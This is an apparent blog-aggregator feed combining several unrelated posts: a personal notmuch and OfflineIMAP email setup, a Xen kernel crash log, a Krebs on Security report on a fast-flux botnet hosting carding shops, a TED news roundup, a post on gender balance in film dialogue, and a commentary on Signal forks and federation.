This is way too long: in my opinion, a bunch of that stuff should be factored in upstream, but some features have been hard to get in. For example, Notmuch is really hesitant about marking emails as deleted. The community is also very strict about having unit tests for everything, which makes writing new patches a significant challenge for a newcomer, who will often need to be familiar with both Elisp and C. So for now I just carry those configs around.

Emails marked as deleted or spam are processed with the following script named notmuch-purge which I symlink to ~/Maildir/.notmuch/hooks/pre-new:

#!/bin/sh

if hostname | grep angela > /dev/null; then
    PREFIX=Anarcat/
else
    PREFIX=.
fi

echo moving tagged spam to the junk folder
notmuch search --output=files tag:spam \
        and not folder:${PREFIX}junk \
        and not folder:${PREFIX}greyspam \
        and not folder:Koumbit/INBOX \
        and not path:Koumbit/** \
    | while read file; do
          mv "$file" "$HOME/Maildir/${PREFIX}junk/cur"
      done

echo unconditionally deleting deleted mails
notmuch search --output=files tag:deleted | xargs -r rm

Oh, and there's also customization for Notmuch:

;; -*- mode: emacs-lisp; auto-recompile: t; -*-
(custom-set-variables
 ;; from https://anarc.at/sigs.fortune
 '(fortune-file "/home/anarcat/.mutt/sigs.fortune")
 '(message-send-hook (quote (notmuch-message-mark-replied)))
 '(notmuch-address-command "notmuch-address")
 '(notmuch-always-prompt-for-sender t)
 '(notmuch-crypto-process-mime t)
 '(notmuch-fcc-dirs
   (quote
    ((".*@koumbit.org" . "Koumbit/INBOX.Sent")
     (".*" . "Anarcat/Sent"))))
 '(notmuch-hello-tag-list-make-query "tag:unread")
 '(notmuch-message-headers (quote ("Subject" "To" "Cc" "Bcc" "Date" "Reply-To")))
 '(notmuch-saved-searches
   (quote
    ((:name "inbox" :query "tag:inbox and not tag:koumbit and not tag:rt")
     (:name "unread inbox" :query "tag:inbox and tag:unread")
     (:name "unread" :query "tag:unred")
     (:name "freshports" :query "tag:freshports and tag:unread")
     (:name "rapports" :query "tag:rapports and tag:unread")
     (:name "sent" :query "tag:sent")
     (:name "drafts" :query "tag:draft"))))
 '(notmuch-search-line-faces
   (quote
    (("deleted" :foreground "red")
     ("unread" :weight bold)
     ("flagged" :foreground "blue"))))/
 '(notmuch-search-oldest-first nil)
 '(notmuch-show-all-multipart/alternative-parts nil)
 '(notmuch-show-all-tags-list t)
 '(notmuch-show-insert-text/plain-hook
   (quote
    (notmuch-wash-convert-inline-patch-to-part notmuch-wash-tidy-citations notmuch-wash-elide-blank-lines notmuch-wash-excerpt-citations)))
 )

I think that covers it.

Offlineimap

So of course the above works well on the server directly, but how do you run Notmuch on a remote machine that doesn't have access to the mail spool directly? This is where OfflineIMAP comes in. It allows me to incrementally synchronize a local Maildir folder hierarchy with a remote IMAP server. I am assuming you already have an IMAP server configured, since you already configured Sieve above.

Note that other synchronization tools exist. The other popular one is isync but I had trouble migrating to it (see courriels for details) so for now I am sticking with OfflineIMAP.

The configuration is fairly simple:

[general]
accounts = Anarcat
ui = Blinkenlights
maxsyncaccounts = 3

[Account Anarcat]
localrepository = LocalAnarcat
remoterepository = RemoteAnarcat
# refresh all mailboxes every 10 minutes
autorefresh = 10
# run notmuch after refresh
postsynchook = notmuch new
# sync only mailboxes that changed
quick = -1
## possible optimisation: ignore mails older than a year
#maxage = 365

# local mailbox location
[Repository LocalAnarcat]
type = Maildir
localfolders = ~/Maildir/Anarcat/

# remote IMAP server
[Repository RemoteAnarcat]
type = IMAP
remoteuser = anarcat
remotehost = anarc.at
ssl = yes
# without this, the cert is not verified (!)
sslcacertfile = /etc/ssl/certs/DST_Root_CA_X3.pem
# do not sync archives
folderfilter = lambda foldername: not re.search('(Sent\.20[01][0-9]\..*)', foldername) and not re.search('(Archive.*)', foldername)
# and only subscribed folders
subscribedonly = yes
# don't reconnect all the time
holdconnectionopen = yes
# get mails from INBOX immediately, doesn't trigger postsynchook
idlefolders = ['INBOX']

Critical parts are:

  • postsynchook: obviously, we want to run notmuch after fetching mail
  • idlefolders: receives emails immediately without waiting for the longer autorefresh delay, which otherwise means that most mailboxes don't see new emails for up to 10 minutes in the worst case. Unfortunately, it doesn't run the postsynchook, so I need to hit G in Emacs to see new mail
  • quick=-1, subscribedonly, holdconnectionopen: makes most runs much, much faster as it skips unchanged or unsubscribed folders and keeps the connection to the server

The other settings should be self-explanatory.

RSS feeds

I gave up on RSS readers, or more precisely, I merged RSS feeds and email. The first time I heard of this, it sounded like a horrible idea, because it means yet more emails! But with proper filtering, it's actually a really nice way to process feeds, since it leverages the distributed nature of email.

For this I use a fairly standard feed2imap, although I do not deliver to an IMAP server, but straight to a local Maildir. The configuration looks like this:

---
include-images: true
target-refix: &target "maildir:///home/anarcat/Maildir/.feeds."
feeds:
- name: Planet Debian
  url: http://planet.debian.org/rss20.xml
  target: [ *target, 'debian-planet' ]

I obviously have more feeds; the above is just an example. This will deliver the feeds as emails, with one mailbox per feed: ~/Maildir/.feeds.debian-planet in the above example.

Troubleshooting

You will fail at writing the sieve filters correctly at some point, and mail will (hopefully?) fall through to your regular mailbox. Syslog will tell you when things fail, as expected, and the details end up in the .dovecot.sieve.log file in your home directory.

I also enabled debugging on the Sieve module:

--- a/dovecot/conf.d/90-sieve.conf
+++ b/dovecot/conf.d/90-sieve.conf
@@ -51,6 +51,7 @@ plugin {
        # deprecated imapflags extension in addition to all extensions were already
   # enabled by default.
   #sieve_extensions = +notify +imapflags
+  sieve_extensions = +vnd.dovecot.debug

   # Which Sieve language extensions are ONLY available in global scripts. This
   # can be used to restrict the use of certain Sieve extensions to administrator

This allowed me to use the debug_log function in the rulesets to output stuff directly to the logfile.

Further improvements

Of course, this is all done on the command line, but that is somewhat expected if you are already running Notmuch. It would be much easier to edit those filters through a GUI: Roundcube has a nice Sieve plugin, and Thunderbird has one as well. Since Sieve is a standard, there are plenty of clients available. All of those need some server-side setup (typically a ManageSieve service), which I didn't bother doing yet.

And of course, a key improvement would be to have Notmuch synchronize its state better with the mailboxes directly, instead of having the notmuch-purge hack above. Dovecot and Maildir formats support up to 26 flags, and there were discussions about using those flags to synchronize with notmuch tags so that multiple notmuch clients can see the same tags on different machines transparently.

This, however, won't make Notmuch work on my phone or webmail or any other more generic client: for that, Sieve rules are still very useful.

I still don't have webmail setup at all: so to read email, I need an actual client, which is currently my phone, which means I need to have Wifi access to read email. "Internet Cafés" or "this guy's computer" won't work as well, although I can always use ssh to login straight to the server and read mails with Mutt.

I am also considering using X509 client certificates to authenticate to the mail server without a passphrase. This involves configuring Postfix, which seems simple enough. Dovecot's configuration seems a little more involved and less well documented. It seems that both OfflineIMAP and K-9 Mail support client-side certs. OfflineIMAP prompts me for the password so it doesn't get leaked anywhere. I am a little concerned about building yet another CA, but I guess it would not be so hard...

The server side of things needs more documenting, particularly the spam filters. This is currently spread around this wiki, mostly in configuration.

Security considerations

The whole purpose of this was to make it easier to read my mail on other devices. This introduces a new vulnerability: someone may steal that device or compromise it to read my mail, impersonate me on different services and even get a shell on the remote server.

Thanks to the two-factor authentication I set up on the server, I feel a little more confident that just getting the passphrase to the mail account isn't sufficient anymore to leverage shell access. It also allows me to login with ssh on the server without trusting the machine too much, although that only goes so far... Of course, sudo is then out of the question and I must assume that everything I see is also seen by the attacker, who can also inject keystrokes and do all sorts of nasty things.

Since I also connected my email account on my phone, someone could steal the phone and start impersonating me. The mitigation here is that there is a PIN for the screen lock, and the phone is encrypted. Encryption isn't so great when the passphrase is a PIN, but I'm working on having a better key that is required on reboot, and the phone shuts down after 5 failed attempts. This is documented in my phone setup.

Client-side X509 certificates further mitigate those kinds of compromises, as the X509 certificate won't give shell access.

Basically, if the phone is lost, all hell breaks loose: I need to change the email password (or revoke the certificate), as I assume the account is about to be compromised. I do not trust Android security to give me protection indefinitely. In fact, one could argue that the phone is already compromised and putting the password there already enabled a possible state-sponsored attacker to hijack my email address. This is why I have an OpenPGP key on my laptop to authenticate myself for critical operations like code signatures.

The risk of identity theft from the state is, after all, a tautology: the state is the primary owner of identities, some could say by definition. So if a state-sponsored attacker would like to masquerade as me, they could simply issue a passport under my name and join an OpenPGP key signing party, and we'd have other problems to deal with, namely, proper infiltration counter-measures and counter-snitching.

Planet DebianIngo Juergensmann: Xen randomly crashing server - part 2

Some weeks ago I blogged about "Xen randomly crashing server". The problem back then was that I couldn't get any information about why the server reboots. Using a netconsole was not possible, because netconsole refused to work with the bridge that is used for Xen networking. Luckily my colocation partner rrbone.net connected the second network port of my server to the network so that I could use eth1 instead of the bridged eth0 for netconsole.

Today the server crashed several times and I was able to collect some more information than just the screenshots from IPMI/KVM console as shown in my last blog entry (full netconsole output is attached as a file): 

May 12 11:56:39 31.172.31.251 [829681.040596] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 3.16.0-4-amd64 #1 Debian 3.16.7-ckt25-2
May 12 11:56:39 31.172.31.251 [829681.040647] Hardware name: Supermicro X9SRE/X9SRE-3F/X9SRi/X9SRi-3F/X9SRE/X9SRE-3F/X9SRi/X9SRi-3F, BIOS 3.0a 01/03/2014
May 12 11:56:39 31.172.31.251 [829681.040701] task: ffffffff8181a460 ti: ffffffff81800000 task.ti: ffffffff81800000
May 12 11:56:39 31.172.31.251 [829681.040749] RIP: e030:[<ffffffff812b7e56>]
May 12 11:56:39 31.172.31.251  [<ffffffff812b7e56>] memcpy+0x6/0x110
May 12 11:56:39 31.172.31.251 [829681.040802] RSP: e02b:ffff880280e03a58  EFLAGS: 00010286
May 12 11:56:39 31.172.31.251 [829681.040834] RAX: ffff88026eec9070 RBX: ffff88023c8f6b00 RCX: 00000000000000ee
May 12 11:56:39 31.172.31.251 [829681.040880] RDX: 00000000000004a0 RSI: ffff88006cd1f000 RDI: ffff88026eec9422
May 12 11:56:39 31.172.31.251 [829681.040927] RBP: ffff880280e03b38 R08: 00000000000006c0 R09: ffff88026eec9062
May 12 11:56:39 31.172.31.251 [829681.040973] R10: 0100000000000000 R11: 00000000af9a2116 R12: ffff88023f440d00
May 12 11:56:39 31.172.31.251 [829681.041020] R13: ffff88006cd1ec66 R14: ffff88025dcf1cc0 R15: 00000000000004a8
May 12 11:56:39 31.172.31.251 [829681.041075] FS:  0000000000000000(0000) GS:ffff880280e00000(0000) knlGS:ffff880280e00000
May 12 11:56:39 31.172.31.251 [829681.041124] CS:  e033 DS: 0000 ES: 0000 CR0: 0000000080050033
May 12 11:56:39 31.172.31.251 [829681.041153] CR2: ffff88006cd1f000 CR3: 0000000271ae8000 CR4: 0000000000042660
May 12 11:56:39 31.172.31.251 [829681.041202] Stack:
May 12 11:56:39 31.172.31.251 [829681.041225]  ffffffff814d38ff
May 12 11:56:39 31.172.31.251  ffff88025b5fa400
May 12 11:56:39 31.172.31.251  ffff880280e03aa8
May 12 11:56:39 31.172.31.251  9401294600a7012a
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041287]  0100000000000000
May 12 11:56:39 31.172.31.251  ffffffff814a000a
May 12 11:56:39 31.172.31.251  000000008181a460
May 12 11:56:39 31.172.31.251  00000000000080fe
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041346]  1ad902feff7ac40e
May 12 11:56:39 31.172.31.251  ffff88006c5fd980
May 12 11:56:39 31.172.31.251  ffff224afc3e1600
May 12 11:56:39 31.172.31.251  ffff88023f440d00
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041407] Call Trace:
May 12 11:56:39 31.172.31.251 [829681.041435]  <IRQ>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041441]
May 12 11:56:39 31.172.31.251  [<ffffffff814d38ff>] ? ndisc_send_redirect+0x3bf/0x410
May 12 11:56:39 31.172.31.251 [829681.041506]  [<ffffffff814a000a>] ? ipmr_device_event+0x7a/0xd0
May 12 11:56:39 31.172.31.251 [829681.041548]  [<ffffffff814bc74c>] ? ip6_forward+0x71c/0x850
May 12 11:56:39 31.172.31.251 [829681.041585]  [<ffffffff814c9e54>] ? ip6_route_input+0xa4/0xd0
May 12 11:56:39 31.172.31.251 [829681.041621]  [<ffffffff8141f1a3>] ? __netif_receive_skb_core+0x543/0x750
May 12 11:56:39 31.172.31.251 [829681.041729]  [<ffffffff8141f42f>] ? netif_receive_skb_internal+0x1f/0x80
May 12 11:56:39 31.172.31.251 [829681.041771]  [<ffffffffa0585eb2>] ? br_handle_frame_finish+0x1c2/0x3c0 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041821]  [<ffffffffa058c757>] ? br_nf_pre_routing_finish_ipv6+0xc7/0x160 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041872]  [<ffffffffa058d0e2>] ? br_nf_pre_routing+0x562/0x630 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041907]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041955]  [<ffffffff8144fb65>] ? nf_iterate+0x65/0xa0
May 12 11:56:39 31.172.31.251 [829681.041987]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042035]  [<ffffffff8144fc16>] ? nf_hook_slow+0x76/0x130
May 12 11:56:39 31.172.31.251 [829681.042067]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042116]  [<ffffffffa0586220>] ? br_handle_frame+0x170/0x240 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042148]  [<ffffffff8141ee24>] ? __netif_receive_skb_core+0x1c4/0x750
May 12 11:56:39 31.172.31.251 [829681.042185]  [<ffffffff81009f9c>] ? xen_clocksource_get_cycles+0x1c/0x20
May 12 11:56:39 31.172.31.251 [829681.042217]  [<ffffffff8141f42f>] ? netif_receive_skb_internal+0x1f/0x80
May 12 11:56:39 31.172.31.251 [829681.042251]  [<ffffffffa063f50f>] ? xenvif_tx_action+0x49f/0x920 [xen_netback]
May 12 11:56:39 31.172.31.251 [829681.042299]  [<ffffffffa06422f8>] ? xenvif_poll+0x28/0x70 [xen_netback]
May 12 11:56:39 31.172.31.251 [829681.042331]  [<ffffffff8141f7b0>] ? net_rx_action+0x140/0x240
May 12 11:56:39 31.172.31.251 [829681.042367]  [<ffffffff8106c6a1>] ? __do_softirq+0xf1/0x290
May 12 11:56:39 31.172.31.251 [829681.042397]  [<ffffffff8106ca75>] ? irq_exit+0x95/0xa0
May 12 11:56:39 31.172.31.251 [829681.042432]  [<ffffffff8135a285>] ? xen_evtchn_do_upcall+0x35/0x50
May 12 11:56:39 31.172.31.251 [829681.042469]  [<ffffffff8151669e>] ? xen_do_hypervisor_callback+0x1e/0x30
May 12 11:56:39 31.172.31.251 [829681.042499]  <EOI>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.042506]
May 12 11:56:39 31.172.31.251  [<ffffffff810013aa>] ? xen_hypercall_sched_op+0xa/0x20
May 12 11:56:39 31.172.31.251 [829681.042561]  [<ffffffff810013aa>] ? xen_hypercall_sched_op+0xa/0x20
May 12 11:56:39 31.172.31.251 [829681.042592]  [<ffffffff81009e7c>] ? xen_safe_halt+0xc/0x20
May 12 11:56:39 31.172.31.251 [829681.042627]  [<ffffffff8101c8c9>] ? default_idle+0x19/0xb0
May 12 11:56:39 31.172.31.251 [829681.042666]  [<ffffffff810a83e0>] ? cpu_startup_entry+0x340/0x400
May 12 11:56:39 31.172.31.251 [829681.042705]  [<ffffffff81903076>] ? start_kernel+0x497/0x4a2
May 12 11:56:39 31.172.31.251 [829681.042735]  [<ffffffff81902a04>] ? set_init_arg+0x4e/0x4e
May 12 11:56:39 31.172.31.251 [829681.042767]  [<ffffffff81904f69>] ? xen_start_kernel+0x569/0x573
May 12 11:56:39 31.172.31.251 [829681.042797] Code:
May 12 11:56:39 31.172.31.251  <f3>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.043113] RIP
May 12 11:56:39 31.172.31.251  [<ffffffff812b7e56>] memcpy+0x6/0x110
May 12 11:56:39 31.172.31.251 [829681.043145]  RSP <ffff880280e03a58>
May 12 11:56:39 31.172.31.251 [829681.043170] CR2: ffff88006cd1f000
May 12 11:56:39 31.172.31.251 [829681.043488] ---[ end trace 1838cb62fe32daad ]---
May 12 11:56:39 31.172.31.251 [829681.048905] Kernel panic - not syncing: Fatal exception in interrupt
May 12 11:56:39 31.172.31.251 [829681.048978] Kernel Offset: 0x0 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffff9fffffff)

I'm not that good at reading this kind of output, but to me it seems that ndisc_send_redirect is at fault. When googling for "ndisc_send_redirect" you can find a patch on lkml.org and Debian bug #804079, both seem to be related to IPv6.

When looking at the linux kernel source mentioned in the lkml patch I see that this patch is already applied (line 1510): 

        if (ha) 
                ndisc_fill_addr_option(buff, ND_OPT_TARGET_LL_ADDR, ha);

So, while the patch was intended to prevent issues "leading to data corruption or in the worst case a panic when the skb_put failed", it does not help in my case or in the case of #804079.

Any tips are appreciated!

PS: I'll contribute to that bug in the BTS, of course!

Attachment: syslog-xen-crash.txt (24.27 KB)

Krebs on SecurityCarding Sites Turn to the ‘Dark Cloud’

Crooks who peddle stolen credit cards on the Internet face a constant challenge: Keeping their shops online and reachable in the face of meddling from law enforcement officials, security firms, researchers and vigilantes. In this post, we’ll examine a large collection of hacked computers around the world that currently serves as a criminal cloud hosting environment for a variety of cybercrime operations, from sending spam to hosting malicious software and stolen credit card shops.

I first became aware of this botnet, which I’ve been referring to as the “Dark Cloud” for want of a better term, after hearing from Noah Dunker, director of security labs at  Kansas City-based vendor RiskAnalytics. Dunker reached out after watching a Youtube video I posted that featured some existing and historic credit card fraud sites. He asked what I knew about one of the carding sites in the video: A fraud shop called “Uncle Sam,” whose home page pictures a pointing Uncle Sam saying “I want YOU to swipe.”

The "Uncle Sam" carding shop is one of a half-dozen that reside on a Dark Cloud criminal hosting environment.

The “Uncle Sam” carding shop is one of a half-dozen that reside on a Dark Cloud criminal hosting environment.

I confessed that I knew little of this shop other than its existence, and asked why he was so interested in this particular crime store. Dunker showed me how the Uncle Sam card shop and at least four others were hosted by the same Dark Cloud, and how the system changed the Internet address of each Web site roughly every three minutes. The entire robot network, or “botnet,” consisted of thousands of hacked home computers spread across virtually every time zone in the world, he said.

Dunker urged me not to take his word for it, but to check for myself the domain name server (DNS) settings of the Uncle Sam shop every few minutes. DNS acts as a kind of Internet white pages, by translating Web site names to numeric addresses that are easier for computers to navigate. The way this so-called “fast-flux” botnet works is that it automatically updates the DNS records of each site hosted in the Dark Cloud every few minutes, randomly shuffling the Internet address of every site on the network from one compromised machine to another in a bid to frustrate those who might try to take the sites offline.

Sure enough, a simple script was all it took to find a few dozen Internet addresses assigned to the Uncle Sam shop over just 20 minutes of running the script. When I let the DNS lookup script run overnight, it came back with more than 1,000 unique addresses to which the site had been moved during the 12 or so hours I let it run. According to Dunker, the vast majority of those Internet addresses (> 80 percent) tie back to home Internet connections in Ukraine, with the rest in Russia and Romania.
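For the curious, a lookup loop of that sort is only a few lines; the sketch below (Python, written for illustration only, with a placeholder domain rather than any of the actual carding domains) simply collects the addresses a name resolves to over time:

import socket
import time

# Poll a domain's DNS record repeatedly and collect the addresses returned.
# "example.com" is a placeholder, not one of the domains discussed above.
seen = set()
for _ in range(20):
    try:
        _, _, addresses = socket.gethostbyname_ex("example.com")
        seen.update(addresses)
    except socket.gaierror:
        pass  # lookup failed; try again on the next pass
    time.sleep(60)

print(len(seen), "unique addresses observed")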

‘Mr. Bin,’ another carding shop hosting on the dark cloud service. A ‘bin’ is the “bank identification number” or the first six digits on a card, and it’s mainly how fraudsters search for stolen cards.

“Right now there’s probably over 2,000 infected endpoints that are mostly broadband subscribers in Eastern Europe,” enslaved as part of this botnet, Dunker said. “It’s a highly functional network, and it feels kind of like a black market version of Amazon Web Services. Some of the systems appear to be used for sending spam and some are for big dynamic scaled content delivery.”

Dunker said that historic DNS records indicate that this botnet has been in operation for at least the past year, but that there are signs it was up and running as early as Summer 2014.

Wayne Crowder, director of threat intelligence for RiskAnalytics, said the botnet appears to be a network structure set up to push different crimeware, including ransomware, click fraud tools, banking Trojans and spam.

Crowder said the Windows-based malware that powers the botnet assigns infected hosts different roles, depending on the victim machine’s strengths or weaknesses: More powerful systems might be used as DNS servers, while infected systems behind home routers may be infected with a “reverse proxy,” which lets the attackers control the system remotely.

“Once it’s infected, it phones home and gets a role assigned to it,” Crowder said. “That may be to continue sending spam, host a reverse proxy, or run a DNS server. It kind of depends on what capabilities it has.”

"Popeye," another carding site hosted on the criminal cloud network.

“Popeye,” another carding site hosted on the criminal cloud network.

Indeed, this network does feel rather spammy. In my book Spam Nation, I detailed how the largest spam affiliate program on the planet at the time used a similar fast-flux network of compromised systems to host its network of pill sites that were being promoted in the junk email. Many of the domains used in those spam campaigns were two- and three-word domains that appeared to be randomly created for use in malware and spam distribution.

“We’re seeing two English words separated by a dash,” Dunker said of the hundreds of hostnames found on the dark cloud network that do not appear to be used for carding shops. “It’s a very spammy naming convention.”

It’s unclear whether this botnet is being used by more than one individual or group. The variety of crimeware campaigns that RiskAnalytics has tracked operating through the network suggests that it may be rented out to multiple different cybercrooks. Still, other clues suggest the whole thing may have been orchestrated by the same gang.

For example, nearly all of the carding sites hosted on the dark cloud network — including Uncle Sam, Scrooge McDuck, Mr. Bin, Try2Swipe, Popeye, and Royaldumps — share the same or very similar site designs. All of them say that customers can look up available cards for sale at the site, but that purchasing the cards requires first contacting the proprietor of the shops directly via instant message.

All six of these shops — and only these six — are advertised prominently on the cybercrime forum prvtzone[dot]su. It is unclear whether this forum is run or frequented by the people who run this botnet, but the forum does heavily steer members interested in carding toward these six carding services. It’s unclear why, but Prvtzone has a Google Analytics tracking ID (UA-65055767) embedded in the HTML source of its page that may hold clues about the proprietors of this crime forum.

The "dumps" section of the cybercrime forum Prvtzone advertises all six of the carding domains found on the fast-flux network.

The “dumps” section of the cybercrime forum Prvtzone advertises all six of the carding domains found on the fast-flux network.

Dunker says he’s convinced it’s one group that occasionally rents out the infrastructure to other criminals.

“At this point, I’m positive that there’s one overarching organized crime operation driving this whole thing,” Dunker said. “But they do appear to be leasing parts of it out to others.”

Dunker and Crowder say they hope to release an initial report on their findings about the botnet sometime next week, but that for now the rabbit hole appears to go quite deep with this crime machine. For instance, there  are several sites hosted on the network that appear to be clones of real businesses selling expensive farm equipment in Europe, and multiple sites report that these are fake companies looking to scam the unwary.

“There are a lot of questions that this research poses that we’d like to be able to answer,” Crowder said.

For now, I’d invite anyone interested to feel free to contribute to the research. This text file contains a historic record of domains I found that are or were at one time tied to the 40 or so Internet addresses I found in my initial, brief DNS scans of this network. Here’s a larger list of some 1,024 addresses that came up when I ran the scan for about 12 hours.

If you liked this story, check out this piece about another carding forum called Joker’s Stash, which also uses a unique communications system to keep itself online and reachable to all comers.

TEDLife on the Chinese-North Korean border, putting the joy back in voting, and an encouragement to give up


North Korean borderlands. Hotel rooms outfitted with binoculars to peer across the river at the forbidden land, spotty phone connections and a bridge partially destroyed by Korean War-era bombs, and smugglers of diamonds, watches and expensive face creams: This is the Chinese-North Korean border, a world of shifting identities and coded language. In the New Republic, Suki Kim traces its shadowy outlines as she makes her way to Dadong, a notoriously dangerous border city. In Dadong, she spends time with a group of smugglers, attempting to pierce the impenetrable logic of their world as she seeks a deeper understanding of North Korea that has always eluded her, “Whatever I sought to understand about North Korea was always beyond my grasp; the country’s inherent unknowability was a condition of its survival.” (Watch Suki’s TED Talk)

How your brain controls what you weigh. Losing weight is hard, and only a slim fraction of dieters are able to do so successfully. In the New York Times, Sandra Aamodt reveals the inherent flaw in dieting: the brain. The brain, she writes, has a host of tools that it uses to keep you within a certain weight range called your set point.  The brain’s natural responses not only make it difficult to lose weight and maintain it, but also make it more likely that you’ll end up gaining weight in the long run. But don’t give up! Sandra offers suggestions on what to do instead–within the limit of your brain’s natural responses, of course. (Watch Sandra’s TED Talk)

The second digital revolution. While the Internet has inarguably been revolutionary, it still faces significant challenges, like reliably verifying identity and conducting transactions online. But blockchain–the technology that powers bitcoin–promises to change all that, argue Don Tapscott and son Alex Tapscott in their new book Blockchain Revolution. The blockchain establishes what they call a “Trust Protocol” and the ability to record “virtually everything of value and importance to humankind,” without having to worry about security. It is, they suggest, the second generation of the digital revolution. (Watch Don’s TED Talk)

Don’t drag yourself to the polls, celebrate! US election seasons used to have parades, festivals and open-air debates — a joyful participation in civic life. Now, they’re mostly soundbites from a TV screen or 140-character inflammations. But it doesn’t have to be this way, says Eric Liu. With help from the Knight Foundation, Civic University, Liu’s nonprofit for powerful citizenship, is launching the Joy of Voting project. In four pilot cities across the country, it will partner with local organizations to get the community excited about voting this November. As Liu writes: “From parades and street theater, to civic engagement apps and university rivalries, this project will combine the old and the new to reinvigorate a culture of voting.” (Watch Eric’s TED Talk)

A hurdle to becoming who you are. Equality needs more than just social acceptance; it needs legal protections. In The Guardian, model and activist Geena Rocero writes that even though she and many other members of the transgender community were socially accepted in the Philippines, not being able to change her name and gender marker on important legal documents was a substantial hindrance — one that motivated her move to America. After moving to San Francisco and later to New York City to pursue a modeling career, she grappled with whether or not to reveal her transgender identity professionally. But after she came out ( at TED2014), she was inspired to tell the stories of others going through similar struggles. “There are still a lot of trans people’s stories that need to be told – the ones who never had the resources and support to emigrate to the United States.” (Watch her TED Talk)

The ultimate check and balance. In his first-ever longform article, Edward Snowden asserts the political and democratic necessity of whistleblowing  in The Intercept. Sitting with the knowledge of enormous, illegal wrongdoing, he says, is an excruciating moral compromise too many are forced to make. Citing heroic examples, such as the Pentagon Papers and Wikileaks, Snowden explains the uncomfortable differences between accepted and illegal whistleblowing. “What explains the distinction between the permissible and the impermissible disclosure? The answer is control. A leak is acceptable if it’s not seen as a threat, a challenge to the prerogatives of the institution.” Despite the enormous risks, he argues, whistleblowers like him act on this core driving principle: “We, the people, are ultimately the strongest and most reliable check on the power of government.” (Watch his TED Talk)

Give up more often. “Never give up” is a cornerstone of persistence and grit. But according to Tim Harford in The Financial Times, knowing when to give up is just as valuable. Using Daniel Kahneman’s (watch his TED Talk) and Amos Tversky’s “loss aversion” principle, Harford shows how our natural psychological dislike of losses over gains causes us to overlook the advantages of moving on and, ultimately, trying a better approach to the same problem. (Watch Tim’s TED Talk)

The unintended consequences of campus reform. At the end of 2015, students protesters across the United States approached campus administrators with demands for campus reform addressing racial concerns on campus. In the Wall Street Journal, using key tenets of psychology and scientific studies, Jonathan Haidt and Lee Jussim show how the proposed reforms may actually backfire, arguing that “they are likely to damage race relations and to make campus life more uncomfortable for everyone, particularly black students.” Instead, they call on universities to try a different approach than the one that has failed over the past several decades, a new approach based on available knowledge of what does and doesn’t work in order to create a campus where everyone feels welcome. (Watch Jonathan’s TED Talk)


Sociological ImagesDatabase Enables Users to Choose Films Based on Gender Balance

Polygraph’s Hanah Anderson and Matt Daniels undertook a massive analysis of the dialogue of approximately 2,000 films, counting those characters who spoke at least 100 words. With the data, they’ve produced a series of visuals that powerfully illustrate male dominance in the American film industry.

We’ve seen data like this before and it tells the same disturbing story: across the industry, whatever the sub-genre, men and their voices take center stage.

They have some other nice insights, too, like the silencing of women as they get older and the enhancing of men’s older voices.

But knowledge is power. My favorite thing about this project is that it enables any of us — absolutely anyone — to look up the gender imbalance in dialogue in any of those 2,000 movies. This means that you can know ahead of time how well women’s and men’s voices are represented and decide whether to watch. The dialogue in Adaptation, for example, is 70% male; Good Will Hunting, 85% male; The Revenant, 100% male.

We could even let the site choose the movies for us. Anderson and Daniels include a convenient dot graph that spans the breadth of inclusion, with each dot representing a movie. You can just click on the distribution that appeals to you and choose a movie from there. Clueless, Gosford Park, and The Wizard of Oz all come in at a perfect 50/50 split. Or, you can select a decade, genre, and gender balance and get suggestions.

Polygraph has enabled us to put our money where our principles are. If enough of us decide that we won’t buy any movie that tilts too far male, it would put pressure on filmmakers to make movies that better reflected real life. This data makes it possible to do just that.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianMatthew Garrett: Convenience, security and freedom - can we pick all three?

Moxie, the lead developer of the Signal secure communication application, recently blogged on the tradeoffs between providing a supportable federated service and providing a compelling application that gains significant adoption. There's a set of perfectly reasonable arguments around that, which I don't want to rehash - regardless of feelings on the benefits of federation in general, there's certainly an increase in engineering cost in providing a stable inter-server protocol that still allows for addition of new features, and the person leading a project gets to make the decision about whether that's a valid tradeoff.

One voiced complaint about Signal on Android is the fact that it depends on the Google Play Services. These are a collection of proprietary functions for integrating with Google-provided services, and Signal depends on them to provide a good out of band notification protocol to allow Signal to be notified when new messages arrive, even if the phone is otherwise in a power saving state. At the time this decision was made, there were no terribly good alternatives for Android. Even now, nobody's really demonstrated a free implementation that supports several million clients and has no negative impact on battery life, so if your aim is to write a secure messaging client that will be adopted by as many people as possible, keeping this dependency is entirely rational.

On the other hand, there are users for whom the decision not to install a Google root of trust on their phone is also entirely rational. I have no especially good reason to believe that Google will ever want to do something inappropriate with my phone or data, but it's certainly possible that they'll be compelled to do so against their will. The set of people who will ever actually face this problem is probably small, but it's probably also the set of people who benefit most from Signal in the first place.

(Even ignoring the dependency on Play Services, people may not find the official client sufficient - it's very difficult to write a single piece of software that satisfies all users, whether that be down to accessibility requirements, OS support or whatever. Slack may be great, but there's still people who choose to use Hipchat)

This shouldn't be a problem. Signal is free software and anybody is free to modify it in any way they want to fit their needs, and as long as they don't break the protocol code in the process it'll carry on working with the existing Signal servers and allow communication with people who run the official client. Unfortunately, Moxie has indicated that he is not happy with forked versions of Signal using the official servers. Since Signal doesn't support federation, that means that users of forked versions will be unable to communicate with users of the official client.

